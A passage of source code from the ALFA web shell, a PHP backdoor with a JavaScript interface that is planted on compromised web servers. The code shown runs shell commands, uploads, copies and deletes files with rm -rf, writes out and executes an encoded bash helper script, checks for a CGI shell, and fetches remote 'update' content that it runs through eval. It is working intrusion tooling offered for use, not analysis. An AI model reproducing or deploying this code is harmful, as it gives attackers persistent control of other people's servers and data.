fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
</script>
</body>
</html>
<?php
}}
if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
function posix_getgrgid($p) {return false;} }
function alfaWhich($p) {
$path = alfaEx('which ' . $p,false,false);
if(!empty($path))
return strlen($path);
return false;
}
function alfaSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function alfaPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function alfaPermsColor($f,$isbash=false){
$class = "";
$num = "";
$human = "";
if($isbash){
$class = $f["class"];
$num = $f["num"];
$human = $f["human"];
}else{
$num = substr(sprintf('%o', @fileperms($f)),-4);
$human = alfaPerms(@fileperms($f));
if(!@is_readable($f))
$class = "main_red_perm";
elseif (!@is_writable($f))
$class = "main_white_perm";
else
$class = "main_green_perm";
}
return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function reArrayFiles($file_post){
$file_ary = array();
$file_count = count($file_post['name']);
$file_keys = array_keys($file_post);
for ($i=0; $i<$file_count; $i++) {
foreach ($file_keys as $key) {
$file_ary[$i][$key] = $file_post[$key][$i];
}
}
return $file_ary;
}
function _alfa_can_runCommand($cgi=true,$cache=true){
  if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
    return true;
  }
  if(strlen(alfaEx("whoami",false,$cgi))>0){
    $_COOKIE["alfa_canruncmd"] = true;
    return true;
  }
  return false;
}
function _alfa_symlink($target, $link){
  $phpsym = function_exists("symlink");
  if($phpsym){
    @symlink($target, $link);
  }else{
    alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  }
}
function _alfa_file_exists($file,$cgi=true){
  if(@file_exists($file)){
    return true;
  }else{
    if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
      return true;
    }
  }
  return false;
}
function _alfa_file($file,$cgi=true){
  $array = @file($file);
  if(!$array){
    if(strlen(alfaEx("id",false,$cgi))>0){
      $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
      if(strlen($data)>0){
        return explode("\n", $data);
      }else{
        return false;
      }
    }else{
      return false;
    }
  }else{
    return $array;
  }
}
function _alfa_is_writable($file){
  $check = false;
  $check = @is_writable($file);
  if(!$check){
    if(_alfa_can_runCommand()){
      $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
      if($check == "yes"){
        $check = true;
      }else{
        $check = false;
      }
    }
  }
  return $check;
}
function _alfa_is_dir($dir,$mode="-d"){
  $check = false;
  $check = @is_dir($dir);
  if($mode == "-e"){
    $check = @is_file($dir);
  }
  if(!$check){
    if(_alfa_can_runCommand()){
      $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
      if($check == "yes"){
        return true;
      }else{
        return false;
      }
    }
  }
  return $check;
}
function _alfa_load_ace_options($base){
  return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
}
function alfaFilesMan2(){
  alfahead();
  AlfaNum(8,9,10,7,6,5,4);
  echo '<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>';
  alfaFooter();
}
function copy_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
function alfaFilesMan(){
if(!empty ($_COOKIE['alfa_f']))
$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
if(!empty($_POST['alfa1'])){
switch($_POST['alfa1']){
case 'uploadFile':
$move_cmd_file = false;
$alfa_canruncmd = false;
if($GLOBALS['glob_chdir_false']){
  $alfa_canruncmd = _alfa_can_runCommand(true,true);
  $move_cmd_file = true;
}
if(_alfa_is_writable($GLOBALS['cwd'])){
$files = reArrayFiles($_FILES['f']);
$ret_files = array();
foreach($files as $file){
if($move_cmd_file&&$alfa_canruncmd){
  alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
}else{
  if(@move_uploaded_file($file['tmp_name'],$file['name'])){
    $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
    $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
    $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
    $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
    $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
    $file_perm = alfaPermsColor($file['name']);
    $file_size = @filesize($file['name']);
    $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
  }
}
}
if(!$move_cmd_file){
  echo json_encode($ret_files);
}
}else{
  echo "noperm";
  return;
}
if(!$move_cmd_file){
return;
}
break;
case 'mkdir':
$new_dir_cmd = false;
if($GLOBALS['glob_chdir_false']){
  if(_alfa_can_runCommand(true,true)){
    if(_alfa_is_writable($GLOBALS['cwd'])){
      if(!_alfa_is_dir(trim($_POST['alfa2']))){
        alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
        echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
      }else{
        echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
      }
    }else{
      echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
    }
  }else{
    echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
  }
}else{
  if(_alfa_is_writable($GLOBALS['cwd'])){
    if(!_alfa_is_dir(trim($_POST['alfa2']))){
      if(!@mkdir(trim($_POST['alfa2']))){
        echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
      }else{
        echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
      }
    }else{
      echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
    }
  }else{
    echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
  }
}
break;
case 'delete':
function deleteDir($path){
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = @opendir($path);
while(($item = @readdir($dh)) !== false){
$item = $path.$item;
if((basename($item) == "..") || (basename($item) == "."))
continue;
$type = @filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
@closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f == '..')
continue;
$f = rawurldecode($f);
if($GLOBALS["glob_chdir_false"]){
  if(_alfa_can_runCommand(true,true)){
    alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
  }
}else{
alfaEx("rm -rf '".addslashes($f)."'",false,false);
if(@is_dir($f))
deleteDir($f);
else
@unlink($f);
}
}
if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
deleteDir(rawurldecode(@$_POST['alfa2']));
alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
}else{
@unlink(rawurldecode(@$_POST['alfa2']));
}
if($GLOBALS["glob_chdir_false"]){
  $source = rawurldecode(@$_POST['alfa2']);
  if($source!='..'&&!empty($source)){
    if(_alfa_can_runCommand(true,true)){
      alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
    }
  }
}
if(is_array($_POST['f']))
return;
break;
case 'paste':
if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
foreach($_COOKIE['alfa_f'] as $f)
copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
function move_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if(($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['alfa_f'] as $f)
@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipX = "alfa_".rand(1,1000).".zip";
if($zip->open($zipX, 1)){
@chdir($_COOKIE['alfa_c']);
foreach($_COOKIE['alfa_f'] as $f){
if($f == '..')continue;
if(@is_file($_COOKIE['alfa_c'].$f))
$zip->addFile($_COOKIE['alfa_c'].$f, $f);
elseif(@is_dir($_COOKIE['alfa_c'].$f)){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach($iterator as $key=>$value){
$key = str_replace('\\','/',realpath($key));
if(@is_dir($key)){
if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
}else{$zip->addFile($key,$key);}}}}
@chdir($GLOBALS['cwd']);
$zip->close();
__alert('>> '.$zipX.' << is created...');}}
}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
foreach($_COOKIE['alfa_f'] as $f) {
if($zip->open($_COOKIE['alfa_c'].$f)){
$zip->extractTo($_COOKIE['alfa_cwd']);
$zip->close();}}}}
unset($_COOKIE['alfa_f']);
break;
default:
if(!empty($_POST['alfa1'])){
if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
__alfa_set_cookie('alfa_c', @$_POST['c']);
return;
}
}
break;
}
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
  $path = explode('/', $res[1]);
  array_pop($path);
  $_POST['c'] = implode('/', $path);
}
$cmd_dir = false;
if($dirContent === false){
  if(_alfa_can_runCommand(true,true)){
    $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
    @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
    if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
      $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
      $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
      __alfa_set_cookie("alfachdir_bash", "true");
      __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
    }
    $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
    $dirContent = json_decode($dirContent, true);
    if(is_array($dirContent)){
      array_pop($dirContent);
      $cmd_dir = true;
    }else{
      $dirContent = false;
    }
  }
}
alfahead();
AlfaNum(8,9,10,7,6,5,4);
$count_dirContent = @count($dirContent);
if($count_dirContent > 300){
  @$_COOKIE["alfa_limited_files"] = 100;
}
$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
$files_page_count = 1;
if($alfa_limited_files > 0){
  $files_page_count = ceil($count_dirContent/$alfa_limited_files);
  if($files_page_count > 1){
    $files_page_count++;
  }
}
echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
if($dirContent == false){
echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
alfaFooter();
return;
}
global $sort;
$sort = array('name', 1);
if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
  $sort[0] = $_COOKIE["alfa_sort_by"];
}
if(!empty($_POST['alfa1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
$sort = array($match[1], (int)$match[2]);
}
if($alfa_files_page_number > ($files_page_count-1)){
  $alfa_files_page_number = 1;
}
$checkbox_rand = rand(11111, 99999);
echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk".$checkbox_rand."' onclick='checkBox(this);' class='chkbx'><label for='mchk".$checkbox_rand."'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissio